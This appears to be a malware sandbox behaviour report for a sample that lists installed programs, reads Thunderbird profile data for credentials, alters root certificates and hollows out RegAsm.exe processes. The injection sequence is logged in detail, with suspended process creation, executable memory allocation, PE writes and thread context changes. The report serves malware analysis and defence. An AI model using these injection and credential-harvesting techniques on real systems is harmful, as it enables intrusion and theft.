RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 7 p.m.	key_handle: 0x000005cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 7 p.m.	key_handle: 0x000005cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 7 p.m.	key_handle: 0x000005cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 7 p.m.	key_handle: 0x000005cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 7 p.m.	key_handle: 0x000005cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 7 p.m.	key_handle: 0x000005cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 7 p.m.	key_handle: 0x000005cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 7 p.m.	key_handle: 0x000005cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 7 p.m.	key_handle: 0x000005cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 7 p.m.	key_handle: 0x000005cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 7 p.m.	key_handle: 0x000005cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 7 p.m.	key_handle: 0x000005cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1

Harvests credentials from local email clients (1 event)

file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (2 events)

process	RegAsm.exe				useragent
process	RegAsm.exe				useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1492 called NtSetContextThread to modify thread in remote process 2076
Process injection	Process 2636 called NtSetContextThread to modify thread in remote process 2736
Process injection	Process 2896 called NtSetContextThread to modify thread in remote process 2996
NtSetContextThread Aug. 24, 2024, 6:59 p.m.	registers.eip: 2005598660 registers.esp: 2686700 registers.edi: 0 registers.eax: 4285584 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000001e0 process_identifier: 2076	1	0	0
NtSetContextThread Aug. 24, 2024, 6:59 p.m.	registers.eip: 2005598660 registers.esp: 1703252 registers.edi: 0 registers.eax: 4282160 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000001e4 process_identifier: 2736	1	0	0
NtSetContextThread Aug. 24, 2024, 6:59 p.m.	registers.eip: 2005598660 registers.esp: 1965592 registers.edi: 0 registers.eax: 4234448 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000001dc process_identifier: 2996	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (16 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1492 resumed a thread in remote process 2076
Process injection	Process 2076 resumed a thread in remote process 2552
Process injection	Process 2076 resumed a thread in remote process 2812
Process injection	Process 2552 resumed a thread in remote process 2636
Process injection	Process 2636 resumed a thread in remote process 2736
Process injection	Process 2736 resumed a thread in remote process 1676
Process injection	Process 2812 resumed a thread in remote process 2896
Process injection	Process 2896 resumed a thread in remote process 2996
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x000001e0 suspend_count: 1 process_identifier: 2076	1	0	0
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x00000574 suspend_count: 1 process_identifier: 2552	1	0	0
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x0000056c suspend_count: 1 process_identifier: 2812	1	0	0
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2636	1	0	0
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x000001e4 suspend_count: 1 process_identifier: 2736	1	0	0
NtResumeThread Aug. 24, 2024, 7 p.m.	thread_handle: 0x0000031c suspend_count: 1 process_identifier: 1676	1	0	0
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2896	1	0	0
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x000001dc suspend_count: 1 process_identifier: 2996	1	0	0

Executed a process and injected code into it, probably while unpacking (50 out of 54 events)

Time & API	Arguments	Status	Return
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 1492	1	0
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x00000158 suspend_count: 1 process_identifier: 1492	1	0
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x00000194 suspend_count: 1 process_identifier: 1492	1	0
CreateProcessInternalW Aug. 24, 2024, 6:59 p.m.	thread_identifier: 2080 thread_handle: 0x000001e0 process_identifier: 2076 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000001e4	1	1
NtGetContextThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x000001e0	1	0
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2076 region_size: 2371584 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001e4	1	0
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $¢båæõ¶æõ¶æõ¶u^¶þõ¶uk¶ëõ¶u_¶Üõ¶ï{v¶åõ¶fzô·äõ¶ï{f¶áõ¶æô¶õ¶uZ¶ôõ¶uh¶çõ¶Richæõ¶PEL7»fà ÈB"dà@0$@È©<à#\|$àô.textJÆÈ à.rdataÞÎàÐÌ@@.data+!°@À.reloc*Dà#F¨@B base_address: 0x00400000 process_identifier: 2076 process_handle: 0x000001e4	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: base_address: 0x00401000 process_identifier: 2076 process_handle: 0x000001e4	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: base_address: 0x0041e000 process_identifier: 2076 process_handle: 0x000001e4	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: LáA.?AVtype_info@@Næ@»±¿D ! 5A CPR S WYl m pr ) ¡¤§ ·Î× ÿÿÿÿÿÿÿÿÈAÈAÈAÈAÈAÈAÈAÈAÈAÈAC$÷A ÷A÷A÷A÷A÷A÷A÷AüöAôöAèöAÜöAÔöAÈöAÄöAÀöA¼öA¸öA´öA°öA¬öA¨öA¤öA öAöAöAöAöA\|öAtöA´öAlöAdöA\öAPöAHöA<öA0öA,öA(öAöAöAüõA ôõAìõAäõAÜõAÔõAÌõAÄõA´õA¤õAõAõAlõA\õAHõA@õA8õA0õA(õA õAõAõAõAõAøôAðôAèôAØôAÄôA¸ôA¬ôA õA ôAôAôApôA`ôALôA8ôA0ôA(ôAôAìóAØóA³B³B³B³B³BÈºB¨øA0ýA°þA³Bx´B abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZXµB¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þÿÿÿÿ þÿÿÿ¬úA..ÀºBÈBÈBÈBÈBÈBÈBÈBÈBÈBÄºBÈBÈBÈBÈBÈBÈBÈBÈºB¨øAªúA.LáA.?AVlogic_error@std@@LáA.?AVlength_error@std@@LáA.?AVout_of_range@std@@LáA.?AVexception@std@@LáA.?AVbad_alloc@std@@ base_address: 0x0042b000 process_identifier: 2076 process_handle: 0x000001e4	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: base_address: 0x0063e000 process_identifier: 2076 process_handle: 0x000001e4	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2076 process_handle: 0x000001e4	1	1
NtSetContextThread Aug. 24, 2024, 6:59 p.m.	registers.eip: 2005598660 registers.esp: 2686700 registers.edi: 0 registers.eax: 4285584 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000001e0 process_identifier: 2076	1	0
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x000001e0 suspend_count: 1 process_identifier: 2076	1	0
CreateProcessInternalW Aug. 24, 2024, 6:59 p.m.	thread_identifier: 2556 thread_handle: 0x00000574 process_identifier: 2552 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\test22JKEGIDGDGH.exe" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000056c	1	1
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x00000574 suspend_count: 1 process_identifier: 2552	1	0
CreateProcessInternalW Aug. 24, 2024, 6:59 p.m.	thread_identifier: 2816 thread_handle: 0x0000056c process_identifier: 2812 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\test22CGCAKKKEGC.exe" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000578	1	1
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x0000056c suspend_count: 1 process_identifier: 2812	1	0
CreateProcessInternalW Aug. 24, 2024, 6:59 p.m.	thread_identifier: 2640 thread_handle: 0x00000084 process_identifier: 2636 current_directory: filepath: C:\Users\test22JKEGIDGDGH.exe track: 1 command_line: "C:\Users\test22JKEGIDGDGH.exe" filepath_r: C:\Users\test22JKEGIDGDGH.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2636	1	0
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2636	1	0
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x00000158 suspend_count: 1 process_identifier: 2636	1	0
NtResumeThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 2636	1	0
CreateProcessInternalW Aug. 24, 2024, 6:59 p.m.	thread_identifier: 2740 thread_handle: 0x000001e4 process_identifier: 2736 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000001e8	1	1
NtGetContextThread Aug. 24, 2024, 6:59 p.m.	thread_handle: 0x000001e4	1	0
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2736 region_size: 2363392 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001e8	1	0
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $d¾] ß3Û ß3Û ß3ÛO©Û+ß3ÛO©Ûß3Û)§°Û%ß3Û)§ Û.ß3Û ¦2Ú#ß3Û ß2Û½ß3ÛO©Ûß3ÛO©®Û!ß3ÛRich ß3ÛPELñÖÇfà Äè0Wà@$Ï@ÀSXÀSXP´°#°À##àô.textàÃÄ `.rdatazà\|È@@.dataÈE!`&D@À.rsrc°°#j@@.relocÌCÀ#Dl@B base_address: 0x00400000 process_identifier: 2736 process_handle: 0x000001e8	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: base_address: 0x00401000 process_identifier: 2736 process_handle: 0x000001e8	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: base_address: 0x0041e000 process_identifier: 2736 process_handle: 0x000001e8	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: base_address: 0x00426000 process_identifier: 2736 process_handle: 0x000001e8	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: 0 HX°#Vä<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> </assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x0063b000 process_identifier: 2736 process_handle: 0x000001e8	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: base_address: 0x0063c000 process_identifier: 2736 process_handle: 0x000001e8	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2736 process_handle: 0x000001e8	1	1
